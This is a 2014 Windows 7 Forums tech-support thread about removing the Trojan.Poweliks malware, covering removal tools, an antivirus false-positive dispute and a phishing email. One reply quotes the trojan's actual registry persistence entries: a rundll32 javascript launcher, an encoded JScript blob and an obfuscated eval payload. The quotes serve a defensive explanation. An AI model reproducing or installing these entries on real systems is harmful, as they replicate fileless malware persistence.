Windows 7 Forums

Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: Trojan.Poweliks

12 Dec 2014   #1
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 
Trojan.Poweliks

Well, picked up a nasty Trojan Wednesday and after working on it that night and the next morning I gave up and let Norton's support tech take care of it. Watch out for "Trojan.Poweliks" that looks like "TROJAN.AdClicker Activity" and some routine messing with MS Powershell. This was the first one of those things that in 50 years plus of computer world that was over my head. It was not from this site, but I know which one. How it got me is a total mystery. It appears to be attacking military related sites.


My System SpecsSystem Spec
.
13 Dec 2014   #2
A Guy

Microsoft Community Contributor Award Recipient

Windows 7 Home Premium x64 SP1
 
 

My System SpecsSystem Spec
13 Dec 2014   #3
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Poweliks is a malware with rootkit-like features, it resides in the registry (loads in memory) is persistent and is not present as a file which can be scanned & removed easily. The payload (malware file) is stored in an encrypted registry value and is loaded at boot time by a key calling rundll32 process with an encrypted javascript payload.

Associated Poweliks Windows Registry Information:

HTML Code:
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current 

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1

HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 " " = "rundll32.exe javascript:"\.\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))"

HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 "a" = "<data to execute>" 
Once the payload is loaded, it executes an embedded powershell script in silent mode. That powershell script contains another encoded payload which will be injected into a legitimate dllhost process (the persistent item), which acts as a trojan downloader for other malware & is also responsible for protecting the registry value by recreating it when removed.

Removal can be attained with these tools (+ additional scans - AV, MBAM, HitmanPro among others) after disabling/removing the persistent item .

Farbar Recovery Scan Tool: Farbar Recovery Scan Tool Download
RogueKiller (by Tigzy): Poweliks removal with RogueKiller
ESET Poweliks Cleaner How do I remove a Poweliks infection? - ESET Knowledgebase

The trojan wrecks several windows "defense" services - Security Center, Defender, Windoze Update, Firewall, etc
ESET Svcs Repair http://kb.eset.com/library/ESET/KB%2...icesRepair.exe <<<Direct DL link

ETA: Relevant links/analysis/removal instrux:

KernelMode.info
http://kb.eset.com/esetkb/index?page...nt&id=SOLN3587
http://www.adlice.com/poweliks-remov...h-roguekiller/
http://www.bleepingcomputer.com/viru...oweliks-trojan
My System SpecsSystem Spec
.

13 Dec 2014   #4
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 

Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....
My System SpecsSystem Spec
13 Dec 2014   #5
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

False positive...
VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

Did you read thru the comprehensive links in my post?

ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.
My System SpecsSystem Spec
13 Dec 2014   #6
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Quote   Quote: Originally Posted by dustymars View Post
Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....
Wait, whut???? I thought Norton support tech "took care of it"

Quote   Quote: Originally Posted by dustymars View Post
Well, picked up a nasty Trojan Wednesday...I gave up and let Norton's support tech take care of it. ...
Apparently, not so much. Are you still infected?
My System SpecsSystem Spec
13 Dec 2014   #7
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 

Quote   Quote: Originally Posted by Urthboundmisfit View Post
False positive...
VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

Did you read thru the comprehensive links in my post?

ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.
I use SUPERAntiSpyware, AdwCleaner,MBAM, I forget some, SpyBot maybe, and MalwareBytes' Anti Rootkit but none of them got rid of it.Norton's did and I checked it out, no more Trojan.I suspect some would like us to get rid of MNorton's and buy their product?This what I say, “Non Gradus Anus Rodentum..”

I said, Norton's did not like the Link you posted, so I will not discard it just because you suggest it. There are other ways to get it done. No I am not infected, or at least no traces of it are in my PC.
My System SpecsSystem Spec
13 Dec 2014   #8
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Quote   Quote: Originally Posted by dustymars View Post
...I suspect some would like us to get rid of MNorton's and buy their product?This what I say, “Non Gradus Anus Rodentum..”
My misunderstanding, though by your wording ("now what") I was under the impression you were still infected/had lingering effects.

I've never paid a cent EVER for any AV, never recommended any AV and never will. I am currently using Avast Free with only File system shield & Web shield... none of the other bells whistles & shiny objects being presented as "protection" these days.

As for Norton, to each his own, hence "YMMV". BTW, you're welcome for the info/links etc.

Unsubscribing...
My System SpecsSystem Spec
13 Dec 2014   #9
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 

Plus, I certainly do not trust Microsoft for any security fro my PC given the glitches in their updates of late and holes they somehow forget. in their software. While some of the professional hackers may have the knowhow and some amateur hackers may have a few brain cells left, they are not smart enough to find the holes and make malware/viruses so it has to be some insider selling the information or a former disgruntle employee selling the information. I would not out it past the so-called anti-virus guys doing evil deeds either. Never trust anyone on the Net -- not even its inventor, AlGore.

The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.
My System SpecsSystem Spec
13 Dec 2014   #10
Borg 386

Win 7 32 Home Premium, Win 7 64 Pro, Win 8.1, Win 10
 
 

Quote   Quote: Originally Posted by dustymars View Post
The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.
Yepperz, lots of scam E Mails this time of year.

Beware this online shopping scam: Fake order confirmations
My System SpecsSystem Spec
Reply

 Trojan.Poweliks




Thread Tools Search this Thread
Search this Thread:

Advanced Search




Similar help and support threads
Thread Forum
Trojan called 'Trojan.Generic.2582177' on my system
Hi, I have Window7 Ultimate 64 bit on my system. I use Bitfender as my antivirus software. This morning it informed me that it has found a file infected with a virus called 'Trojan.Generic.2582177' which it cannot clean. I've contacted Bitfender to see if they know what I should do but haven't...
System Security
Is that a Trojan?
I scanned my pc with SuperAntispyware and found this but i dont know if is true or fulse alert. Any idea?
System Security
Trojan:Win32/FakeSpypro & Trojan:JS/FakeSpypro
A little help,please.Got this trojan earlier.It disabled MSE,MBAM,Internet,CCleaner,and pretty much anything .exe.Claimed everything was infected...so says whatever fake AV program that came with it.(I wish I could figure out how to use the indention tool here)I had to restart,open task manager...
System Security
New trojan
Hi, there's this new trojan which I found on a website. Its filename is Bookmark.exe. Strange is that only 22/40 anti malware engines were able to detect it. Currently, I was trying Norton 360 beta 4 which has failed to detect it. :shock: So far, this trojan has changed my IE8 homepage. Not...
System Security


Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd

All times are GMT -5. The time now is 17:06.

Twitter Facebook Google+



Windows 7 Forums

Seven Forums Android App Seven Forums IOS App